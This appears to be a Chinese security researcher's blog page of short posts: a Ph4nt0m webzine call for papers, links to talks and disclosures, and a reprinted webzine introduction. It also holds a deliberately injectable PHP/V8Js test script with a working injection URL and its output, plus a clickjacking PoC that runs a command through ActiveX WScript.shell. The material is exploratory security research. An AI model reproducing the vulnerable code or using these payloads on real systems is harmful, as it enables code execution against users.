Ph4nt0m Webzine 0x07 Call for Papers

“最后感谢那些一直在坚持，一直在分享的好人们。希望我们还有下一期！！” 这是上一期的webzine 0x06首篇《Introduction》里最后一句话，希望别人“坚持”的同时，首先要展示我们自己的“坚持” 。于是有了今天的CFP ......

关于 webzine：

Ph4nt0m Webzine的主题将关注于于漏洞分析、加密解密、协议安全分析、后门与rootkit技术、web应用安全、系统底层分析、操作系统安全性、企业安全防护方案等等。要求文章的内容新颖或者有创意。

目前webzine已经成功发行了6期。现在新的一期开始面向公众征稿。任何有兴趣的朋友，都可以将你的稿件投递到

mail：5up3rh3i@gmail.com 

当然有我qq的朋友，可以直接通过qq联系。我们将对您的稿件进行审阅，并发送反馈。您有任何问题，也可以来信咨询。

另外本期我们将与 腾讯安全应急响应中心（TSRC）合作，并得他们的大力赞助，稿件一旦采用将获得又腾讯公司提供的 小Q机器人一个 。

这里再次感谢 腾讯安全应急响应中心（TSRC）的朋友们，尤其是lake2同学，支持“坚持分享”的公司及团队是值得我们尊敬的！

工作原因，关注的东西不一样了，所以好像错过了一些东西，记录一下  ：）

UTF-16によるContent Security Policyの迂回

大风出的新书：《白帽子讲Web安全》虽然我还没看过，不过就大风以往的文章来看，应该值得期待 :)。 当然大风的粉丝那么多，我估计他这个书应该销量不错。

然后就是大牛flashsky在《互联网用户安全峰会》上的演讲视频：http://v.youku.com/v_show/id_XMzY5MTE5MjQw.html 大牛对安全及安全漏洞的理解都是值得推荐的 ：） 其他的视屏见 ：http://www.secsay.com/?p=2340002 淘宝及人人举办的这样沙龙、会议，都是不错的，都有视频和ppt分享，只是建议一下，露视频的时候，最好把ppt录进去啊 ，老是只看到人 ，有啥子好看的嘛~~~

另外就是BLACK HAT EUROPE 2012的资料出来了:https://www.blackhat.com/html/bh-eu-12/bh-eu-12-archives.html

http://seclists.org/fulldisclosure/2012/Feb/409 

测试一下，安装php-v8js需要php在5.33及以上版本。

root@ubuntu:/home/heige/exp# pecl install v8js

Failed to download pecl/v8js within preferred state "stable", latest release is version 0.1.2, stability "beta", use "channel://pecl.php.net/v8js-0.1.2" to install

install failed

root@ubuntu:/home/heige/exp# pecl install channel://pecl.php.net/v8js-0.1.2

WARNING: channel "pecl.php.net" has updated its protocols, use "pecl channel-update pecl.php.net" to update

downloading v8js-0.1.2.tgz ...

Starting to download v8js-0.1.2.tgz (17,745 bytes)

......done: 17,745 bytes

8 source files, building

running: phpize

Configuring for:

PHP Api Version:         20090626

Zend Module Api No:      20090626

Zend Extension Api No:   220090626

Please provide the installation prefix of libv8 [autodetect] :

building in /tmp/pear/temp/pear-build-rootHrXXj4/v8js-0.1.2

running: /tmp/pear/temp/v8js/configure --with-v8js

checking for grep that handles long lines and -e... /bin/grep

checking for egrep... /bin/grep -E

checking for a sed that does not truncate output... /bin/sed

checking for cc... cc

checking whether the C compiler works... yes

checking for C compiler default output file name... a.out

checking for suffix of executables...

checking whether we are cross compiling... no

checking for suffix of object files... o

checking whether we are using the GNU C compiler... yes

checking whether cc accepts -g... yes

checking for cc option to accept ISO C89... none needed

checking how to run the C preprocessor... cc -E

checking for icc... no

checking for suncc... no

checking whether cc understands -c and -o together... yes

checking for system library directory... lib

checking if compiler supports -R... no

checking if compiler supports -Wl,-rpath,... yes

checking build system type... i686-pc-linux-gnu

checking host system type... i686-pc-linux-gnu

checking target system type... i686-pc-linux-gnu

checking for PHP prefix... /usr

checking for PHP includes... -I/usr/include/php5 -I/usr/include/php5/main -I/usr/include/php5/TSRM -I/usr/include/php5/Zend -I/usr/include/php5/ext -I/usr/include/php5/ext/date/lib -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64

checking for PHP extension directory... /usr/lib/php5/20090626+lfs

checking for PHP installed headers prefix... /usr/include/php5

checking if debug is enabled... no

checking if zts is enabled... no

checking for re2c... no

configure: WARNING: You will need re2c 0.13.4 or later if you want to regenerate PHP parsers.

checking for gawk... no

checking for nawk... nawk

checking if nawk is broken... no

checking for V8 Javascript Engine... yes, shared

checking for V8 files in default path... not found

configure: error: Please reinstall the v8 distribution

ERROR: `/tmp/pear/temp/v8js/configure --with-v8js' failed

用上面的方式安装会失败，经过Ryat牛的指点，直接下deb安装：https://launchpad.net/~ivan1986/+archive/ppa/+build/2627836

然后修改一下php.ini 调用 就ok了：

extension=v8js.so

测试代码：

<?php

$msg = $_GET['msg'];

$v8 = new V8Js();

$JS = <<< EOT

var msg='$msg';

print(msg);

EOT;

try {

  var_dump($v8->executeString($JS, 'basic.js'));

} catch (V8JsException $e) {

  var_dump($e);

}

?>

http://localhost/v8jsvul.php?msg=11%27;print%28new%20Date%28%29%29;var%20a=%27

得到

Sun Feb 26 2012 21:37:31 GMT-0800 (PST)11int(2)

至于还可以做点啥子，我就不 太清楚了，望看官们指点~~~~~~

http://www.80vul.com/webzine_0x06/

android系列0day的 e文版：

http://www.80vul.com/android/android-0days.txt

以及外媒的新闻：http://threatpost.com/en_us/blogs/researchers-dump-trove-0days-popular-android-applications-020812

有意思的老外：

Research on 6 zero day vulnerabilities was published on Wednesday by a group calling itself 80vul Quality Assurance Group. Little is known about 80vul, which describes itself as "a group of dedicated young people" on their Web page. Those vulnerabilities include cross site scripting, cross domain and cross protocol vulnerabilities in Webkit - a common component in Android, iOS and Max OSX devices. The researchers also found a cross site scripting vulnerability on a version of the Google Reader application for HTC Mobile devices that could allow a malformed ("evil") RSS feed to access data on the device.

Introduction

by superhei

坚持是一个永久的话题，在上一期的Introduction里开头是这样一句话“曾经迷茫，曾经一度

想放弃，但最终我们坚持了下来。”，然而我们的坚持最终遗留下了一个空白的2011年，在这

一年了我们没有了webzine，没有了planet，有的只是少许的技术博客及一些8挂的微博。

我们还能坚持多久？我们在重复着Xfocus、灰色轨迹、小榕论坛的道路，我们在慢慢消失...

很多的人都在埋怨“已经没有人愿意分享”，那么为什么呢？，最多的回答的是“技术人员要

吃饭”，我想这个是最现实的答案！然而当我看到老一辈的那些科学家、数学家在吃不饱睡不

暖的时候还再那坚持技术研究和分享时，我想“要吃饭”应该不是这个问题的答案！

曾几何时，2009年Pwn2Own Contest 上，Dino Dai Zovi、Charlie Miller 、Alex Sotirov 

提出的“No More Free Bugs”口号，现在一度成为拒绝分享的借口！当然我也是“No More 

Free Bugs”的支持者，但是我认为这个口号的对象是厂商，而不是热爱技术研究的人员。

分享是快乐的！分享可以发现你的不足，让你的技术更进一步！分享可以让你不再沉迷过去，

而更多的是开始新的技术研究，永远走在技术研究的前沿！我想很多分享过的牛人们都有过这

样的体会。

那么，让分享来得猛烈些吧！

本期诞生过程是非常艰难的，尤其是征稿，更加体现了上面“坚持与分享”现状！于是我想就

由80vul出个“专辑”好了，当然由于技术研究层面问题，直接导致了本期都是基于应用层面

的文章：

首先是余弦写的关于XSS Hack获取明文密码的文章，然后有PHP大牛ryat的关于"Php Codz 

Hacking"方面的paper，剩下的就是我写的关于分析测试android平台下的应用安全及一篇凑数

的关于ie一些猥琐流漏洞的总结性文章。

另外，编辑真是一个苦差事，终于了解到了luoluo和大风在以往的webzine里做出的巨大贡献。

所以由于精力和水平的问题，本期将缺少牛人采访的环节...

最后感谢那些一直在坚持，一直在分享的好人们。希望我们还有下一期！！

-EOF-

准备辞职转行。

寻找一个看得上我的boss或者创业伙伴...

只是目前有个要求就是可以在家里工作，待遇要求不高。

首先说明Inertia这个单词我是用google翻译得到的“惯性”的意思，如果有不妥的，还请指正！！

Google的大牛 Michal Zalewski为了配合他的新书《The Tangled Web》，最近更新了一系列关于猥琐流的blog，其中有一blog《X-Frame-Options, or solving the wrong problem》提到一个关于X-Frame-Options没有办法防御的一种Clickjacking攻击方式。

POC:http://lcamtuf.coredump.cx/clickit/

很多人看这样的攻击方式角度放在history.forward() and history.back()上，但在作者的设计上看，我认为不如把角度放在那个"game"的设计上：一系列的随机点击...

这个让我想起了，前段时间想到的一个类似的思路，利用在某些第三方ie浏览器本地跨域通过WScript.shell执行命令的利用上，在调用WScript.shell的时候，会弹出如下图这样的提示：

如果我们利用"Inertia-Clickjacking"或许可以提高成功率?!!!

<script>

for(i=0;i<10;i++){

alert('11111111111111111111111111111111111');

}

new ActiveXObject("WScript.shell").Run('calc.exe',1,true);

</script>

欢迎各大androider加入指导.....